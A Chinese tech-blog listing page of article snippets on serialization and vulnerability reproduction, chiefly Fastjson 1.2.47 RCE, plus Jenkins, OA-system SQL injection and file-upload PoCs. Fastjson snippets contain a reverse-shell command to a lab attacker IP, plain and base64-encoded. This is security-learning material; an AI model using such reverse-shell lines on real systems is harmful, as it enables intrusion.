Typecho反序列化漏洞复现

LD_PRELOAD劫持(超详细篇)

目录前提知识环境变量链接LD_PRELOADLD_LIBRARY_PATHELF文件/bin、/sbin、/usr/sbin、/usr/bin漏洞复现案例一(随机数劫持)案例二(ls的劫持)案例三(__
coleak·2023-11-29 10:23

ASP.NET Core Web API设置响应输出的Json数据格式的两种方式

前言在ASP.NETCoreWebAPI中设置响应输出Json数据格式有两种方式,可以通过添加System.Text.Json或Newtonsoft.JsonJSON序列化和反序列化库在应用程序中全局设置接口响应的
追逐时光者·2023-11-29 10:22

了解 LD_PRELOAD及漏洞复现

一、了解LD_PRELOADLD_PRELOAD是Linux/Unix系统的一个环境变量,它影响程序的运行时的链接(Runtimelinker),它允许在程序运行前定义优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。(一)、程序的链接程序的链接可以分为以下三种静态链接
树上一太阳·2023-11-29 10:19

Pikachu靶场(PHP反序列化漏洞)

查看php反序列化漏洞的概述,了解序列化与反序列化。构造payloadalert('wjy')";}$c=newS();echo(serialize($c));?
西柠!·2023-11-29 08:52

C++ 二进制数据序列化和反序列化

一、基础知识1、memcpy:内存拷贝函数函数原型:void*memcpy(void*dest,constvoid*src,size_tcount);2、代码编写(采用循环的方式将字节内容逐一拷贝)void*my_memcpy(void*dest,constvoid*src,size_tcount){assert(dest);//防止函数接受空指针进行操作assert(src);void*ret=
川谷_·2023-11-29 07:07

【计算机网络学习之路】序列化,反序列化和初识协议

文章目录前言一.序列化和反序列化1.自己实现2.JSON二.初识协议结束语前言本系列文章是计算机网络学习的笔记,欢迎大佬们阅读,纠错,分享相关知识。希望可以与你共同进步。
好想有猫猫·2023-11-29 07:53

易宝OA系统ExecuteSqlForSingle接口SQL注入漏洞复现 [附POC]

文章目录易宝OA系统ExecuteSqlForSingle接口SQL注入漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.
gaynell·2023-11-29 07:21

Jackson 注解及配置大全

Jackson基本注解注解说明@JsonProperty属性注解,把属性的名称序列化时转换为另外一个名称@JsonIgnore属性注解,使相应字段不参与序列化和反序列化@JsonIgnoreProperties
小花卷的dad·2023-11-29 06:24

序列化体系之常用的序列化方案的深入浅出

今天我们来一起聊一下序列化和反序列化,其实这两个“活宝”对大家来说都不陌生,而且也会觉得这有什么好聊的,其实笔者之前也是这样想的,可就是这么简单的两个东西,反而往往会忽略。
初夏的雪·2023-11-29 05:06

jenkins 代码执行 (CVE-2017-1000353)漏洞复现

jenkins代码执行(CVE-2017-1000353)漏洞复现名称:jenkins代码执行(CVE-2017-1000353)描述:Jenkins可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助
梧六柒·2023-11-29 03:26

jekins CVE-2018-1000861 漏洞复现

jekinsCVE-2018-1000861漏洞复现‍名称:jenkins命令执行(CVE-2018-1000861)描述:Jenkins可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助
梧六柒·2023-11-29 03:54

fastjson 1.2.24 反序列化导致任意命令执行漏洞

漏洞描述fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。参考资料:浅谈FastjsonRCE漏洞的绕过史-FreeBuf网络安全行业门户http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A
blackK_YC·2023-11-29 03:52

Fastjson-1.2.47远程命令执行漏洞(标明坑位)

真的是有其人的,于是花了一点时间去复现这个洞,毕竟工作上有可能会遇到的,并且也标明了一些坑位,反正按照这篇文章是可以100%机率可以复现成功的漏洞概述首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通
晚安這個未知的世界·2023-11-29 03:51

fastjson1.2.47RCE远程命令执行漏洞复现

fastjson1.2.47RCE远程命令执行漏洞复现漏洞背景在2019年6月,fastjson被爆出在fastjson&/dev/tcp/x.x.x.x/port0>&1"};Processpc=rt.exec
zyl404·2023-11-29 03:51

fastjson漏洞 - Fastjson1.2.47反序列化漏洞

文章目录Fastjson简介历史漏洞Fastjson&/dev/tcp/攻击机ip/66660>&1进行base64编码bash-i>&/dev/tcp/192.168.88.128/99990>&1bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEyOC85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}java-
渗透测试小白·2023-11-29 03:20

fastjson 1.2.24 反序列化 CVE-2017-18349 && Fastjson 1.2.47 远程命令执行漏洞

前言fastjson库是Java的一个json库,其作用是将Java对象转换成json数据来表示,也可以将json数据转换成Java对象漏洞描述FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。环境准备靶场:Vulhub靶机:192.168.239.128Kali:1
哇·咔咔·2023-11-29 03:20

fastjson 1.2.47 远程命令执行漏洞

fastjson1.2.47远程命令执行漏洞文章目录fastjson1.2.47远程命令执行漏洞1在线漏洞解读:2环境搭建3影响版本:4漏洞复现4.1访问页面4.2bp抓包,修改参数5使用插件检测漏洞【
煜磊·2023-11-29 03:50

rmi远程代码执行漏洞_Fastjson 1.2.47 远程命令执行漏洞 - 漏洞环境

fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
weixin_39686192·2023-11-29 03:49

复现Fastjson 1.2.47 远程命令执行漏洞

fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
清风-77·2023-11-29 03:17

Fastjson 1.2.47 远程命令执行漏洞复现记录分享

Fastjson1.2.47远程命令执行漏洞复现前言环境要求环境准备靶机VPS漏洞复现前言Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。
YezIwnl·2023-11-29 03:46

vulhub复现之fastjson1.2.47漏洞复现

漏洞复现反弹shell前言:干什么事情都要坚持到底一定一定可以成功哒!!!学习真是痛并快乐着!在此鸣谢郭师傅对我的悉心教导!听我说谢谢你!看到这个漏洞我想先得知道什么是json?
小杜不饿·2023-11-29 03:15

【黑客】网络安全—小白自学笔记

2.渗透技术掌握A.初级渗透首先要学习网络安全的渗透基础内容,包括信息收集,web安全,渗透工具精通,漏洞复现和实战漏洞挖掘B.高级渗透-分方向内容分很多但是整体所需要掌握的内容差
羊村最强沸羊羊·2023-11-29 03:12

网络安全小白自学

2.渗透技术掌握A.初级渗透首先要学习网络安全的渗透基础内容,包括信息收集,web安全,渗透工具精通,漏洞复现和实战漏洞挖掘B.高级渗透-分方向内容分很多但是整体所需要掌握的内容差
羊村最强沸羊羊·2023-11-29 03:12

Fastjson 1.2.47 远程命令执行漏洞

fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
blackK_YC·2023-11-29 03:37

想成为网络安全工程师该如何学习?

2.渗透技术掌握A.初级渗透首先要学习网络安全的渗透基础内容,包括信息收集,web安全,渗透工具精通,漏洞复现和实战漏洞挖掘B.高级渗透-分方向内容分很多但是整体所需要掌握的内容差
羊村最强沸羊羊·2023-11-29 03:35

亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口存在任意文件上传漏洞 附POC

1.亿赛通电子文档安全管理系统接口简介微信公众号搜索:南风漏洞复现文库该文章南风漏洞复现文库公众号首发亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱
sublime88·2023-11-29 02:38

用友NC word.docx接口存在任意文件读取漏洞 附POC

1.用友NC简介微信公众号搜索:南风漏洞复现文库该文章南风漏洞复现文库公众号首发用友网络是全球领先的企业与公共组织软件、云服务
sublime88·2023-11-29 02:38

通达OA inc/package/down.php接口存在未授权访问漏洞 附POC

1.通达OA接口简介微信公众号搜索:南风漏洞复现文库该文章南风漏洞复现文库公众号首发通达OA(Office
sublime88·2023-11-29 02:02

海康运行管理中心 RCE漏洞复现

0x01产品简介海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。海康运行管理中心是一款功能强大、易于使用的安防管理平台,能满足用户对视频监控、报警管理、设备配置和数据统计等方面的需求,帮助用户建立高效、智能的安防系统。0x02漏洞概述海康运行管理中心系统使用低版本的fastjson,攻击者可在未鉴权情况下获取服务器权限,且由于存在相关依赖,即使服务器不出网无法远程加载恶意类也可通过本
OidBoy_G·2023-11-28 22:34

泛微E-Office SQL注入漏洞复现

0x01产品简介泛微E-Office是一款标准化的协同OA办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。0x02漏洞概述泛微e-officejson_common.php、flow_xml.php、sms_page.php、getUserLists、detail.php、Init.ph
OidBoy_G·2023-11-28 22:34

Java相关的序列化与反序列化

一、序列化的目的存储传输深拷贝扩大权限定义将对象的状态信息组织为字节流(二进制流)的形式过程。实质一种用来处理对象流的机制结构化数据的编码二、序列化的技术分类Java语言专用Java内置序列化kryoFSTIDLThriftAvroprotocolbuffer非IDL技术XMLJSON三、Java序列化核心技术实现方式自定义实现Serializable(readObject和writeObject
拦路雨g·2023-11-28 22:10

使用Typecho搭建个人博客网站,并内网穿透实现公网访问

使用Typecho搭建个人博客网站,并内网穿透实现公网访问文章目录使用Typecho搭建个人博客网站,并内网穿透实现公网访问前言1.安装环境2.下载Typecho3.创建站点4.访问Typecho5.安装
小小娥子·2023-11-28 21:53

Weblogic 常见漏洞汇总

WebLogicXMLDecoder反序列化漏洞(CVE
半只特立独行的猪·2023-11-28 18:19

业务逻辑漏洞原理及复现

业务逻辑漏洞复现文章目录业务逻辑漏洞复现什么是业务逻辑漏洞验证码绕过漏洞复现抓包1分钱购买商品dami_5.4逻辑漏洞复现皮卡丘验证码绕过什么是业务逻辑漏洞由于开发者的逻辑不严谨,造成的程序异常由于开发者的逻辑不严谨造成的程序功能异常比如某一个购物软件使用
抠脚大汉在网络·2023-11-28 17:32

pikachu靶场:php反序列化漏洞

pikachu靶场:php反序列化漏洞文章目录pikachu靶场:php反序列化漏洞代码审计漏洞利用代码审计像这种反序列化的代码基本都是代码审计出的//定义一个名为S的类,该类有一个属性$test和一个构造函数
抠脚大汉在网络·2023-11-28 17:00

Nexus Repository Manager3远程命令执行漏洞复现CVE-2020-10199

0x00简介nexus的全称是NexusRepositoryManager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、gitlfs、yum、go、apt等的私有仓
5f4120c4213b·2023-11-28 15:53

Jackson的基本用法

Jackson是当前用的比较广泛的,用来序列化和反序列化json的Java的开源框架。
A_一只小菜鸟·2023-11-28 12:55

SparkSQL与parquet,处理decimal类型数据时遇到的问题及注意事项

SparkSQL为了更好的性能,在读写Hivemetastoreparquet格式的表时,会默认使用自己的ParquetSerDe,而不是采用Hive的SerDe进行序列化和反序列化
雾岛与鲸·2023-11-28 11:03

玩转微服务-基础篇-JDK17实用特性

TextBlocks5.增强的伪随机数生成器6.密封类sealedclass7.NullPointerExceptions优化8.Stream.toList()9.Records10.JEP415:指定上下文的反序列化过滤器
Elcker·2023-11-28 11:22

反序列化漏洞

反序列化漏洞:序列化:就是把一个对象变成字符串,目的就是为了方便传输,或者保存在内存,文件(可以节省内存空间),数据库中。反序列化:就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。
TEST_a130·2023-11-28 11:30

java对象 转换成json字符串 工具类 jackson

它提供了一组功能强大的API,用于在Java对象和JSON数据之间进行高效的序列化(将对象转换为JSON格式)和反序列化(将JSON转换为对象)操作。
丁真学java·2023-11-28 08:49

微服务之Dubbo介绍与用法

相比较,RPC的方式效率会更高,因为他们所传输的内容可能会较少,因此速度更快,以及性能消耗较少,比如说一些RPC传输以二进制的形式去快速传递,而HTTP需要以JSON格式的形式去传输,包括一些序列化与反序列化对象的时间
tttjh-·2023-11-28 07:58

微服务&Dubbo

4、Sentinel限流熔断降级核心源码剖析5、分布式事务(seata)6.序列化与反序列化二、Dubbo底层原理与源码1、为什么不注入实现类而是接口?通过按口怎么找到具体的提供者实现方法?
方生方死·2023-11-28 07:48

Junos webauth_operation.php 文件上传漏洞复现(CVE-2023-36844)

0x01产品简介Junos是JuniperNetworks生产的一款可靠的高性能网络操作系统。0x02漏洞概述Junoswebauth_operation.php接口处存在文件上传漏洞,未经身份认证的攻击者可利用Junos操作系统的J-Web服务/webauth_operation.php路由上传phpwebshell,通过?PHPRC参数进行包含,进入控制整个web服务器。0x03复现环境FOF
OidBoy_G·2023-11-28 07:11

广联达linkworks 文件上传漏洞复现

0x01产品简介广联达LinkWorks(也称为GlinkLink或GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。0x02漏洞概述由于广联达LinkWorks/GB/LK/ArchiveManagement/Js/GWGDWebService.asmx接
OidBoy_G·2023-11-28 07:10

东胜物流软件 SQL注入漏洞复现

0x01产品简介东胜物流软件是一款致力于为客户提供IT支撑的SOP,帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。0x02漏洞概述东胜物流软件TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/SaveUserQuerySetting等接口处存在SQL注入漏洞,攻击者除了可以利用
OidBoy_G·2023-11-28 07:10

金蝶Apusic应用服务器 任意文件上传漏洞复现

0x01产品简介金蝶Apusic应用服务器(ApusicApplicationServer,AAS)是一款标准、安全、高效、集成并具丰富功能的企业级应用服务器软件,全面支持JakartaEE8/9的技术规范,提供满足该规范的Web容器、EJB容器以及WebService容器等,支持Websocket1.1、Servlet4.0、HTTP2.0等最新的技术规范,为企业级应用的便捷开发、灵活部署、可靠
OidBoy_G·2023-11-28 07:33

泛微E-Cology SQL注入漏洞复现【QVD-2023-15672】

泛微E-CologySQL注入漏洞复现【QVD-2023-15672】一、产品简介二、漏洞概述三、影响范围四、复现环境五、漏洞复现六、修复建议免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失
安全攻防赵小龙·2023-11-28 05:58

Google Chrome 任意文件读取 (CVE-2023-4357)漏洞复现

GoogleChrome任意文件读取(CVE-2023-4357)漏洞复现1.漏洞描述该漏洞的存在是由于GoogleChrome中用户提供的XML输入验证不足。
天猫来下凡·2023-11-28 05:58

泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现

影响版本:泛微Ecology9.x<=v10.56;泛微Ecology8.x<=v10.562.漏洞复现POC/mobile/p
天猫来下凡·2023-11-28 05:58
上一页 30 31 32 33 34 35 36 37 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他